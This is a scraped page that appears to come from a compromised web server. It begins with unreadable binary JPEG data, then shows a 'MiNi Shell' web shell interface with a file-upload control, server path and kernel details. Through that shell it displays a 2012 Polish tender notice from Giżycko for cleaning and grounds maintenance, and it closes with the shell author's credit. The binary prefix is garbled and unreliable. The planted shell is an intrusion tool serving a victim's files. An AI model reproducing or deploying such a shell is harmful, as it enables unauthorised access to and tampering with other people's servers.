JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120903/327082-N-2012.html

<p class="kh_header"><b>Giżycko: Utrzymanie czystości i porządku w nieruchomościach budynkowych oraz terenach Gminy Miejskiej Giżycko zarządzanych przez spółkę z o.o. Administrator w Giżycku. Prowadzenie, udostępnianie i utrzymanie czystości w szalecie w budynku przy dworcu PKP oraz terenu wokół w okresie od 01.10.2012r. do 30.09.2013r.</b><br>
<b>Numer ogłoszenia: 327082 - 2012; data zamieszczenia: 03.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Administrator" Sp. z o.o. , ul. Pocztowa 3, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4282962, 4282598, faks 087 4282962.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.administrator-gizycko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. zarządzająca nieruchomościami.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku w nieruchomościach budynkowych oraz terenach Gminy Miejskiej Giżycko zarządzanych przez spółkę z o.o. Administrator w Giżycku. Prowadzenie, udostępnianie i utrzymanie czystości w szalecie w budynku przy dworcu PKP oraz terenu wokół w okresie od 01.10.2012r. do 30.09.2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Utrzymanie czystości i porządku w nieruchomościach budynkowych oraz terenach Gminy Miejskiej Giżycko zarządzanych przez spółkę z o.o. Administrator w Giżycku. Prowadzenie, udostępnianie i utrzymanie czystości w szalecie w budynku przy dworcu PKP oraz terenu wokół w okresie od 01.10.2012r. do 30.09.2013r.  Zakres zamówienia :Utrzymanie czystości i porządku :
Budynki :
a.obmiatanie klatek schodowych - 1 raz / dzień i gruntowne sprzątanie po remoncie,
b.obmiatanie korytarzy piwnic - nie rzadziej jak 1 raz / miesiąc 
i w zależności od potrzeb,
c.zmywanie schodów na klatkach schodowych /szorowanie schodów drewnianych/- nie rzadziej jak 1 raz w miesiącu oraz każdorazowo w przypadku zabrudzenia wydzielinami ludzkimi i zwierzęcymi,
d.obmiatanie strychów -nie rzadziej jak 1 raz / miesiąc i w zależności od potrzeb,
e.zmywanie lamperii w klatkach schodowych 2 razy / rok, w terminach do 30 V  i  30 XI i w zależności od potrzeb,
f.mycie okien i drzwi wejściowych do budynku i piwnic ,w obrębie klatek schodowych - 2 razy / rok w terminach do 30 V i do 30 XI 
i w zależności od potrzeb,
g.sprzątanie pomieszczeń pralni ,suszarni ,przyłączy wodomierzy głównych - nie rzadziej niż 1 raz / miesiąc i w zależności od  potrzeb.
h.opróżnianie koszy na śmieci /zewnętrzynych/.
Uwaga :
Zmywanie klatek schodowych oraz mycie lamperii, okien i drzwi należy wykonywać przy zastosowaniu środków chemicznych dopuszczonych do stosowania w gospodarstwach domowych.
Podwórka, drogi wewnętrzne, chodniki .
-obmiatanie w zależności od potrzeb codziennie.
Dojścia do śmietników i w ich obrębie.
-obmiatanie w zależności od potrzeb codziennie.
Usuwanie wiatrołomów.
Utrzymanie i pielęgnacja zieleni.
a. koszenie w okresie od  01.05.  do  31.10.  - w zależności od potrzeb,  usuwanie skoszonej trawy w ciągu 24 godzin
b. bieżące zbieranie zanieczyszczeń stałych, c. odtwarzanie i odmładzanie zieleńców po okresie zimowym wg potrzeb,d. usuwanie chwastów z opasek, chodników, dojazdów i zsypów piwnicznych oraz talerzowanie drzew i krzewów
Przycinanie krzewów oraz pielenie żywopłotów, wycinka odrostów przy pniach drzew.
-w zależności od potrzeb.
Likwidacja skutków zimy:
Chodniki 
a.usuwanie śniegu
- chodniki winny być wolne od śniegu od godz. 6,00 i utrzymane 
w takim stanie przy dużych opadach w ciągu dnia, łącznie z dniami wolnymi od pracy i w święta
b.usuwanie błota pośniegowego 
- codziennie i w zależności od występujących potrzeb ,c.wywożenie nadmiaru śniegu
- w zależności od potrzeb
d.oczyszczanie ze śniegu i lodu schodów do lokali użytkowych /sklepy,  biura/
Podwórka, drogi wewnętrzne, obręb śmietników
- codziennie łącznie z dniami wolnymi od pracy i świętami :
a.usuwanie śniegu
- na najczęściej użytkowanych dojściach do śmietników i ich obrębie 
- odśnieżanie dróg dojazdowych i wewnętrznych   
- odśnieżanie dojścia i dojazdów do składów i garaży
b.likwidacja gołoledzi i śliskości pośniegowej
- w zależności od potrzeb
Uwaga :
Likwidacja gołoledzi i śliskości pośniegowej winna odbywać się poprzez posypywanie piaskiem .
Zabrania się stosowania żużlu oraz środków chemicznych
Inne prace porządkowe
Budynki
a. wymiana spalonych żarówek w klatkach schodowych korytarzach, strychach, przed wejściem do klatek schodowych oraz korytarzach piwnicznych o mocy   nie większej niż 40 W,
b.likwidacja skutków niedrożności instalacji kanalizacyjnej polegającej na usuwaniu nieczystości i dezynfekcji korytarzy piwnicznych, bieżące informowanie służb Zamawiającego o zauważonych  nieprawidłowościach, usterkach w obrębie   
nieruchomości  budynkowych,
c.drobne naprawy w budynkach jak:
-szklenie okienek piwnicznych, okien na klatce schodowej o  powierzchni szkła do 0,2 m2 
-drobne naprawy okien na klatkach schodowych,
-drobne naprawy drzwi wejściowych i samozamykaczy,
d.czyszczenie  /studzienek/okienek piwnicznych znajdujących się na zewnątrz budynku,
e. drobne naprawy chodników  przy budynkach  /wymiana lub uzupełnienie do 6 płytek chodnikowych i 2 mb krawężnika /
f. wymiana piasku w piaskownicach dwa razy do roku w terminie do 15V i do  01 VIII.
g. doręczanie korespondencji najemcom i właścicielom za pokwitowaniem w terminie dwudniowym /zawiadomienia na zebrania/
h. mycie gablot, umieszczanie i usuwanie nieaktualnych ogłoszeń ,obwieszczeń i spisów lokatorów  w gablotach.
i. usuwanie zbędnych przedmiotów z korytarzy piwnicznych, strychów,pralni, suszarni i pomieszczeń wodomierzowych.
1. Prowadzenie, udostępnianie i  utrzymanie czystości  w  szalecie w budynku przy dworcu PKP oraz terenu wokół.
Szczegółowe informacje dotyczące przedmiotu i wielkości zamówienia określone są w załącznikach nr 3 i nr 7 SIWZ. Ogólna informacja o przedmiocie zamówienia na dzień 01.07.2012r.: Klatki schodowe- 1899 m2, Chodniki- 15122 m2, Podwórka- 41976 m2, Drogi- 20104 m2, Zieleń- 52611 m2. Uwaga: Przedmiot zamówienia tj. ogólna powierzchnia nieruchomości jak i terenu do sprzątania w okresie trwania umowy może ulec zmianie wskutek zbycia mienia miejskiego, rozbiórki itp. Wówczas zmianie ulegnie zakres zamówienia, a tym samym wynagrodzenie zostanie stosownie pomniejszone wg obowiązującej ceny jednostkowej stawki.  W przypadku zwiększenia przedmiotu zamówienia zmianie ulegnie zakres zamówienia, a tym samym wynagrodzenie zostanie stosownie powiększone wg obowiązującej ceny jednostkowej stawki. Istnieje również możliwość podpisania stosownych umów o utrzymanie porządku i czystości ze Wspólnotami Mieszkaniowymi zarządzanymi przez spółkę z o.o. Administrator w Giżycku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w przypadku gdy przedmiot zamówienia tj. ogólna powierzchnia nieruchomości jak i terenu do sprzątania w okresie trwania umowy ulegnie zwiększeniu, wówczas wynagrodzenie zostanie stosownie powiększone wg obowiązującej ceny jednostkowej stawki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w przetargu jest wniesienie wadium w wysokości 6,000 PLN słownie : sześć tysięcy złotych 00/100 groszy, najpóźniej do wyznaczonego terminu składania ofert. Wadium można wnieść w formie określonej w ustawie z dnia 29 stycznia 2004r. Prawo zamówień publicznych art. 45 ust. 6 i 7, tj. w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie  kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz.U. nr 109, poz. 1158 z późn. zm/. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego PKO BP SA o/Giżycko nr 62 1020 4753 0000 0102 0003 8745. Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. Oryginał dokumentu świadczący o wniesieniu wadium w innej formie niż w pieniądzu należy zdeponować w sekretariacie Zamawiającego /pok. nr 1/.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy prowadzenia działalności gospodarczej na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej, posiadania zezwolenia na prowadzenie działalności w zakresie zbierania i transportu odpadów z grupy 20 / odpady komunalne łącznie z frakcjami gromadzonymi oddzielnie/ oraz oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy Pzp. Ocena spełnienia tego warunku zostanie dokonana na podstawie formuły spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy wykonania w okresie ostatnich 3 lat co najmniej jednego zamówienia odpowiadającego swoim rodzajem zakresowi przetargowemu stanowiącemu przedmiot zamówienia, przedstawi tytuł prawny /może być umowa przedwstępna/ do lokalu, nieruchomości na terenie miasta Giżycka, który będzie biurem obsługi, bądź złożą oświadczenie, że najpóźniej do dnia podpisania umowy będą dysponować lokalem wyposażonym w stałe łącze telefoniczne na terenie miasta Giżycka, umożliwiającym realizację zamówienia, przedstawi harmonogram zorganizowania sprzątania nieruchomości i terenów zielonych w okresie letnim oraz zimowym wraz z zabezpieczeniem osobowym i sprzętowym / czas rozpoczęcia pracy, zakończenie, nadzór, opis posiadanego zaplecza osobowego i sprzętowego/ . Ocena spełnienia tego warunku zostanie dokonana na podstawie formuły spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy, aby posiadał odpowiednie wyposażenie techniczne /posiadają sprzęt niezbędny do realizacji zamówienia, tytuł prawny do lokalu, który będzie biurem obsługi, przedstawią harmonogram zorganizowania sprzątania nieruchomości i terenów zielonych w okresie letnim i zimowym wraz z zabezpieczeniem osobowym i sprzętowym/- dokładny opis w SIWZ. Ocena spełnienia tego warunku zostanie dokonana na podstawie formuły spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 50000,00 PLN. Ocena spełnienia tego warunku zostanie dokonana na podstawie formuły spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta złożona przez Wykonawcę powinna być przygotowana w formie pisemnej wg poniższych warunków i powinna zawierać następujące informacje: 1. Wypełniony i podpisany formularz oferty cenowej, 2. Wypełniony i podpisany projekt umowy, 3. Podpisany zakres zadań wykonawcy, 4. Oświadczenie Wykonawcy o gotowości do zawarcia umowy, 5. Informacja o podwykonawcach, 6.  Wykaz zrealizowanych zadań w ciągu ostatnich 3 lat, 7. Wykaz sprzętu niezbędnego do realizacji zamówienia , 8.  Tytuł prawny do lokalu/ nieruchomości, który będzie biurem obsługi, 9. Harmonogram zorganizowania sprzątania nieruchomości i terenów zielonych 10.Potwierdzenie wniesienia wadium, 11. Pełnomocnictwo gdy Wykonawcę reprezentuje pełnomocnik, 12. Oświadczenie z ilu stron składa się oferta
Wszystkie strony oferty powinny być ponumerowane, kopie dokumentów poświadczone za zgodność z oryginałem przez Wykonawcę. Wszystkie przedkładane w ofercie dokumenty powinny być podpisane przez osobę upoważnioną do reprezentowania firmy zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian w umowie w przypadku: Zmiany ustawowej podatku od towaru i usług, Zmiany przepisów w oparciu, o które ustalono zakres obowiązków Wykonawcy, Zmiany przedmiotu zamówienia / zmiana powierzchni nieruchomości i terenu do sprzątania/</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.administrator-gizycko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administrator spółka z o.o. w Giżycku, ul. Pocztowa 3, 11-500 Giżycko, pok nr 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 10:00, miejsce: Administrator spółka z o.o. w Giżycku, ul. Pocztowa 3, 11-500 Giżycko, pok nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com